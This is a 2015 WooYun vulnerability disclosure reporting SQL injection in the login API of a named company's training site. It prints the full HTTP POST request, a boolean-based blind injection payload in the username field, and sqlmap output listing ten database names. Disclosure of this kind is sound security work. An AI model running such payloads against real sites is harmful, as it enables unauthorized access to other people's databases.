当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117672

漏洞标题:传神某站SQL注入

相关厂商:transn.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-02 11:28

修复时间:2015-06-07 11:30

公开时间:2015-06-07 11:30

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-02: 细节已通知厂商并且等待厂商处理中
2015-06-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

POST注入数据包

POST /ctat_v2/index.php/LoginApi/login/ HTTP/1.1
Host: training.transn.com
Content-Length: 32
Accept: application/json, text/javascript, */*
Origin: http://training.transn.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.0.595.32 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://training.transn.com/ctat_v2/index.php/LoginApi/loginPage
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=03c79ef8cc60d5f73389956bbe883983
username=admin&passwd=admin&fr=


参数 username 未过滤 保存为 1.txt 丢进 sqlmap 中

1.png


十个库

漏洞证明:

POST parameter 'username' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 80 HTTP(s) requ
ests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=admin' AND 8740=8740 AND 'xUGy'='xUGy&passwd=admin&fr=
---
[11:10:07] [INFO] testing MySQL
[11:10:07] [INFO] confirming MySQL
[11:10:07] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[11:10:07] [INFO] fetching database names
[11:10:07] [INFO] fetching number of databases
[11:10:07] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[11:10:07] [INFO] retrieved: 10
[11:10:08] [INFO] retrieved: information_schema
[11:10:17] [INFO] retrieved: nankaictat
[11:10:22] [INFO] retrieved: nankaitraining
[11:10:30] [INFO] retrieved: nankaitraining_wtm
[11:10:39] [INFO] retrieved: new_training
[11:10:45] [INFO] retrieved: new_training_wtm
[11:10:54] [INFO] retrieved: test
[11:10:56] [INFO] retrieved: test_entwcat
[11:11:03] [INFO] retrieved: test_translib
[11:11:10] [INFO] retrieved: test_wattapi
available databases [10]:
[*] information_schema
[*] nankaictat
[*] nankaitraining
[*] nankaitraining_wtm
[*] new_training
[*] new_training_wtm
[*] test
[*] test_entwcat
[*] test_translib
[*] test_wattapi

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-07 11:30

厂商回复:

最新状态:

暂无